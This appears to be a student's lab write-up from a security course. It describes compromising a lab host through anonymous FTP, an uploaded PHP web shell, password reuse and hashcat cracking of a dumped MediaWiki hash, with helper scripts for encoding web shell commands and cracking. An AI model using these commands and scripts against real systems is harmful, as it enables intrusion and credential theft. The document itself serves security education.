Week 7 File Vulnerability (SEC 335) - Chromosom3/TechNotes GitHub Wiki
Reflection
Looking at the mistakes Pippin's system administrator(s) made, one stands out above the others: running an anonymous FTP server that allows file uploads. This is what allowed me to gain an initial foothold on the system, and it exposes the system to a great deal of risk. The other large mistake was the reuse of passwords. Once I had FTP access I was able to find the SQL database's root user password. This also turned out to be the SSH password for the peregrin.took user account. From there I had SSH and database root access. Looking in the database I found a password hash for a web app user, and once cracked that password was also the password for the root user. In addition to reusing passwords, the passwords that were used were weak.
Prelab Webshell Assignment
Before beginning work on the lab, I did the assignment on web shells as recommended by the instructor. This assignment was relatively simple and consisted of setting up a PHP web server that serves a web shell. Once that was set up I practiced different types of code execution through the web shell.
Using the command php -S 127.0.0.1:8090 -t . I started PHP's built-in web server with my current directory as the document root, listening on localhost port 8090. This directory contained a simple PHP web shell copied from /usr/share/webshells/php/simple-backdoor.php. Once the web server was running with the web shell in place I used the command curl -v 127.0.0.1:8090/simple-backdoor.php?cmd="ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;chmod+777+script.sh;./script.sh" to execute code via the web shell. Below is a breakdown of what the command is doing.
# The first part of the command tells curl to connect to the web server at the IP, port and URL below
curl -v 127.0.0.1:8090/simple-backdoor.php
# The latter half of the URL (? and after) contains the GET parameters you are sending to the server.
?cmd="ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;chmod+777+script.sh;./script.sh"
# The double quotes are consumed by the local shell; they stop the local shell from treating ; and > as its own
# command separator and redirection. What is actually sent as the "cmd" value is:
ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;chmod+777+script.sh;./script.sh
# Note: spaces in a query string must be encoded as + or %20 (PHP decodes both to a space when it builds $_GET).
# PHP also decodes every %XX escape, so %2D becomes -, and the command that actually runs on the server is:
ip a;whoami;echo 'ping -c 1 google.com'>script.sh;chmod 777 script.sh;./script.sh
# Looking at this we can see it is actually 5 commands separated by ;
ip a # Returns IP information in the curl response
whoami # Returns the user the web server process runs as, in the curl response
echo 'ping -c 1 google.com'>script.sh # Creates a script.sh file on the remote system containing the single command below
ping -c 1 google.com # Pings google.com once
chmod 777 script.sh # Makes the script executable (chmod +x would be enough; 777 also makes it world-writable)
./script.sh # Executes the script. The results are returned in the curl response
Link on URL encoding: http://www.cheat-sheets.org/sites/html.su/urlencoding.html
The image below shows the successful execution of the commands above.
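The encoding step above is easy to get wrong by hand, so here is an added example (my own code, not part of the original assignment or the web shell) showing both directions: how PHP turns the raw query string into the cmd value it hands to system(), and how to percent-encode an arbitrary command so characters like & and # are not swallowed by the query-string parser. The query string constant is copied from the curl command above; the "echo a & whoami" command is a constructed input.

```python
"""Added example: how the cmd= query string is encoded by the client and
decoded by PHP before it reaches system() in the web shell."""
from urllib.parse import quote_plus, unquote_plus

# Constructed: the query string exactly as sent by the curl command above
# (after the local shell has removed the double quotes).
PAGE_QUERY = ("cmd=ip+a;whoami;echo+'ping%20%2Dc%201%20google.com'>script.sh;"
              "chmod+777+script.sh;./script.sh")


def php_style_get(query: str) -> dict:
    """Decode a query string the way PHP builds $_GET: pairs are split on '&'
    only (never on ';'), '+' becomes a space and every %XX escape is decoded.
    Implemented by hand so it does not depend on urllib.parse.parse_qs, whose
    treatment of ';' changed between Python versions."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def build_webshell_url(base_url: str, shell_cmd: str) -> str:
    """Percent-encode an arbitrary shell command for the cmd parameter.
    safe='' forces '&', '#', '+', ';' and friends to be escaped, so the whole
    command reaches the server instead of being cut at the first '&'."""
    return f"{base_url}?cmd={quote_plus(shell_cmd, safe='')}"


def split_commands(shell_cmd: str) -> list:
    """Split a decoded command line on ';' (the simple chaining used above)."""
    return [c for c in shell_cmd.split(";") if c]


if __name__ == "__main__":
    decoded = php_style_get(PAGE_QUERY)["cmd"]
    print("server runs :", decoded)
    print("command count:", len(split_commands(decoded)))
    # Hand-encoding spaces only is not enough once the command contains '&':
    print("naive        :", php_style_get("cmd=" + "echo a & whoami".replace(" ", "+"))["cmd"])
    print("encoded      :", build_webshell_url("http://127.0.0.1:8090/simple-backdoor.php", "echo a & whoami"))
```

The naive case is the one to remember: replacing spaces with + works for the command on this page, but a command containing & (or #, or a literal +) is truncated by the server before it is executed, which looks like the web shell "not working" when it is really a query-string problem.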
File Vulnerability Lab
Recon
The first step was to perform recon on the target (10.0.5.25). Using the command nmap 10.0.5.25 -A I found three services running on the system. The -A flag tells nmap to "Enable OS detection, version detection, script scanning, and traceroute". The results of this command can be seen below in the image.
From the Nmap scan we can see that there is a web server, an FTP server, and SSH on the system. Nmap (via its ftp-anon script) also indicated that the FTP server allows anonymous logins. We can use the command ftp -a 10.0.5.25 to connect to the server anonymously (-a tells tnftp to skip the normal login prompt and log in as anonymous). We can then use the ls command to list the contents of the root FTP directory. For more information on the ftp command see the man page (https://linux.die.net/man/1/tnftp).
Looking at the ls command output in the image above we can see that the "upload" directory has permissions set to 777. This means that not only the owner and group but everyone has full permission to read, write, and execute; for a directory, write means anyone can create files in it, which is what we exploit later. After poking around in the directories for a bit I found two files of interest, the MediaWiki configuration files. Using the following commands I was able to download them.
ftp -a 10.0.5.25
get LocalSettings.php
cd includes
get DefaultSettings.php
exit
Using grep and parsing the files manually I was able to get information about the MediaWiki and SQL services. LocalSettings.php is where MediaWiki keeps its database settings ($wgDBserver, $wgDBname, $wgDBuser and $wgDBpassword), so the database credentials sit there in plain text. The images below show some of the useful information.
DefaultSettings.php:
LocalSettings.php:
Exploitation
Going back to the FTP server we can attempt to upload a web shell to the "upload" directory. This is done with the following commands.
ftp -a 10.0.5.25
cd upload
put ./webshell/navarro.php navarro.php
Note that the first path given to the put command is the local path and the second is the remote path; if you don't specify a remote path it reuses the local path as given. The results of these commands can be seen below in the two images. The first shows the put command working and the second is a directory listing after the upload.
Now that the file has been uploaded it can be found at http://10.0.5.25/upload/navarro.php, which tells us the FTP "upload" directory sits inside the web root and the web server executes PHP placed there. This means we can take the lessons learned from the prelab assignment to get remote code execution on the target system. Using the command curl -v 10.0.5.25/upload/navarro.php?cmd="cat+/etc/passwd" we can list all the accounts on the remote system. This is shown in the image below.
One notable account is seen on the last line of the /etc/passwd file: peregrin.took:x:1001:1001::/home/peregrin.took:/bin/bash. It has a real login shell (/bin/bash) and a UID of 1001, so it is a regular user account we can target. During recon we found a password in LocalSettings.php. It was set for the SQL database, but we can attempt to log in over SSH as peregrin.took with that password. Doing so works, which confirms that passwords are being reused, and we now have a foothold on the system.
From our recon of the MediaWiki configuration we know that there is a database on this system. We can connect with the command mysql -u root -p and, at the prompt, enter the SQL password that was found in the configuration file. Next, the following commands can be used.
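Picking the one interesting line out of /etc/passwd by eye works on a small box; on a larger one it is worth filtering. The following is an added example (my own code, not from the lab) that parses passwd output as returned by the web shell and keeps only accounts that can actually log in: root plus regular users (UID 1000 and up, the Debian/Ubuntu convention) whose shell is not a nologin shell. The sample passwd text is constructed; only its last line is the real line quoted above.

```python
"""Added example: pick out interactive user accounts from the /etc/passwd
content returned through the web shell."""

# Shells that deny interactive login on common distributions.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}

# Constructed sample; only the last line is taken from the lab output above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
peregrin.took:x:1001:1001::/home/peregrin.took:/bin/bash
"""


def parse_passwd(text: str):
    """Yield (name, uid, gid, home, shell) for each well-formed passwd line.
    Lines that do not have exactly seven ':'-separated fields (truncated or
    garbled web shell output, comments) are skipped rather than crashing."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        yield name, int(uid), int(gid), home, shell


def login_candidates(text: str, min_uid: int = 1000) -> list:
    """Names of accounts worth trying credentials against: root and regular
    users (uid >= min_uid) that have a real login shell."""
    names = []
    for name, uid, _gid, _home, shell in parse_passwd(text):
        if shell in NOLOGIN_SHELLS:
            continue
        if uid == 0 or uid >= min_uid:
            names.append(name)
    return names


if __name__ == "__main__":
    for name in login_candidates(SAMPLE_PASSWD):
        print(name)
```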
# Shows all the databases on the SQL server
show databases;
# Select the MediaWiki database and use that for future commands
use mediawiki;
# Show all the tables for the current database
show tables;
# Select everything from the user table
select * from user;
The above commands result in output from the SQL server similar to the one below.
+---------+-----------+----------------+-------------------------------------------------------------------------------------------------------------------------------------------+------------------+-------------------+------------+----------------+----------------------------------+--------------------------+----------------------------------+--------------------------+-------------------+----------------+-----------------------+
| user_id | user_name | user_real_name | user_password | user_newpassword | user_newpass_time | user_email | user_touched | user_token | user_email_authenticated | user_email_token | user_email_token_expires | user_registration | user_editcount | user_password_expires |
+---------+-----------+----------------+-------------------------------------------------------------------------------------------------------------------------------------------+------------------+-------------------+------------+----------------+----------------------------------+--------------------------+----------------------------------+--------------------------+-------------------+----------------+-----------------------+
| 1 | Pippin | | :pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg== | | NULL | | 20220803113106 | 28973ed8b0f0f0a1523c81ee60f1943a | NULL | | NULL | 20220803113059 | 0 | NULL |
| 2 | 1234 | | :pbkdf2:sha512:30000:64:RF3BGQ6mFJJQr5d7v8teFw==:rMX+DEQRv2Ntwxx/PLVKbHo82gt/062BnmCcbKqQaBq2aOhxaOwz4U7E6gi0m1jUglQgV67AE+jjb5couiGyDQ== | | NULL | | 20221018161536 | 9d25ea139fdeabdd76a3d4561cfe08ee | NULL | | NULL | 20221018161530 | 0 | NULL |
| 3 | Navarro | | :pbkdf2:sha512:30000:64:Nrqxb76L20Xh0qVjT32zOw==:uoBliqUr2FOs0g2hQoRfhKZEqvo9V2LEyIg1kQxJ3S0B0BgBPfa940x4OtsWpFmzM2DKcZbSs1ig/4ZW7N88pQ== | | NULL | | 20221023014216 | 158a47a1a51d70517fa6e92e7a5b1f55 | NULL | | NULL | 20221023014210 | 0 | NULL |
+---------+-----------+----------------+-------------------------------------------------------------------------------------------------------------------------------------------+------------------+-------------------+------------+----------------+----------------------------------+--------------------------+----------------------------------+--------------------------+-------------------+----------------+-----------------------+
In this output we can see that there is a MediaWiki user named "Pippin" and their password hash. The system administrators are reusing passwords, so this hash is worth saving and cracking. We can use hashcat to crack it, but first we need to set up the hash file. The hash in the database is :pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==. This is MediaWiki's PBKDF2 format: the fields are the scheme (pbkdf2), the HMAC digest (sha512), the iteration count (30000), the derived-key length in bytes (64), the base64 salt, and the base64 derived key. hashcat's PBKDF2-HMAC-SHA512 mode expects sha512:<iterations>:<base64 salt>:<base64 key>, so the first value and the fourth value need to be removed and we end up with sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==. Put that single line in hash.txt and it will work with hashcat as long as you use mode 12100 (PBKDF2-HMAC-SHA512). The full command would be hashcat -m 12100 hash.txt -w 4 -a 0 wordlist.txt (-a 0 is a straight dictionary attack, -w 4 is the most aggressive workload profile). Expect it to be slow compared to an unsalted hash: every guess costs 30,000 HMAC-SHA512 iterations, which is the whole point of PBKDF2.
Once the password is cracked we can attempt to elevate to root. Because the same password was also set for the root account, su - with the cracked password gives us a root shell.
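To see exactly what the hash-file conversion above drops and keeps, and to sanity-check a cracked candidate without re-running hashcat, here is an added example (my own code, not part of the lab or of MediaWiki) that parses the :pbkdf2: format, emits the -m 12100 line, and verifies a candidate password with hashlib.pbkdf2_hmac. The Pippin hash is copied from the user table above; since I do not know its password, the verification and the toy dictionary attack run against a constructed hash with a known password ("winter2022" and its fixed salt are assumptions made for the demo).

```python
"""Added example: parse MediaWiki's :pbkdf2: password hash, convert it to the
hashcat -m 12100 input line, and verify candidate passwords locally."""
import base64
import hashlib
import hmac
import os
from typing import Optional

# The Pippin hash exactly as it appears in the user table above.
PAGE_HASH = (":pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:"
             "49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/"
             "Cjx3zxZyQcfNChAnP11GNg==")


def parse_mediawiki_pbkdf2(stored: str) -> dict:
    """Split ':pbkdf2:<digest>:<rounds>:<dklen>:<b64 salt>:<b64 key>' into fields
    and check that the key really is <dklen> bytes long."""
    parts = stored.split(":")
    if len(parts) != 7 or parts[0] != "" or parts[1] != "pbkdf2":
        raise ValueError("not a MediaWiki :pbkdf2: hash")
    _, _, digest, rounds, dklen, salt_b64, key_b64 = parts
    key = base64.b64decode(key_b64)
    if len(key) != int(dklen):
        raise ValueError("derived key length does not match the dklen field")
    return {"digest": digest, "rounds": int(rounds), "dklen": int(dklen),
            "salt": base64.b64decode(salt_b64), "key": key,
            "salt_b64": salt_b64, "key_b64": key_b64}


def to_hashcat_12100(stored: str) -> str:
    """hashcat mode 12100 (PBKDF2-HMAC-SHA512) wants sha512:<rounds>:<b64 salt>:<b64 key>.
    Drop the leading scheme and the dklen field; keep the base64 blobs untouched."""
    p = parse_mediawiki_pbkdf2(stored)
    if p["digest"] != "sha512":
        raise ValueError(f"mode 12100 is SHA-512 only, got {p['digest']}")
    return f"sha512:{p['rounds']}:{p['salt_b64']}:{p['key_b64']}"


def verify(stored: str, candidate: str) -> bool:
    """Recompute PBKDF2 with the stored parameters and compare in constant time."""
    p = parse_mediawiki_pbkdf2(stored)
    derived = hashlib.pbkdf2_hmac(p["digest"], candidate.encode("utf-8"),
                                  p["salt"], p["rounds"], dklen=p["dklen"])
    return hmac.compare_digest(derived, p["key"])


def make_mediawiki_pbkdf2(password: str, salt: Optional[bytes] = None,
                          rounds: int = 30000, dklen: int = 64) -> str:
    """Build a hash in the same format (used here to get a test hash with a known password)."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, rounds, dklen=dklen)
    return ":pbkdf2:sha512:%d:%d:%s:%s" % (
        rounds, dklen, base64.b64encode(salt).decode(), base64.b64encode(key).decode())


def dictionary_attack(stored: str, wordlist) -> Optional[str]:
    """What hashcat -a 0 does, in slow motion: return the first word that verifies."""
    for word in wordlist:
        if verify(stored, word):
            return word
    return None


if __name__ == "__main__":
    print(to_hashcat_12100(PAGE_HASH))
    # Constructed demo hash: assumed password and a fixed salt, not Pippin's real credentials.
    demo = make_mediawiki_pbkdf2("winter2022", salt=b"0123456789abcdef")
    print(dictionary_attack(demo, ["password", "letmein", "winter2022"]))
```

dictionary_attack is deliberately naive: it is there to make the cost visible (each call to verify is a full 30,000-round PBKDF2), not to replace hashcat. Once hashcat reports a password, verify(PAGE_HASH, candidate) is a quick way to confirm the result before spending it on su or SSH.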
Hashcat on Windows with GPU
To expedite the process of cracking the password hash we can leverage our GPUs. In this section, I will cover how to configure hashcat to leverage a GPU on Windows. This will cover specifically setting up an NVIDIA GPU on Windows. You need to first download the CUDA toolkit. You can download it from https://developer.nvidia.com/cuda-downloads. This will also download your GPU drives. Once this is installed you can run hashcat -I
to ensure the device is being detected. Finally, you can run hashcat -b
to benchmark hashcat with your GPU.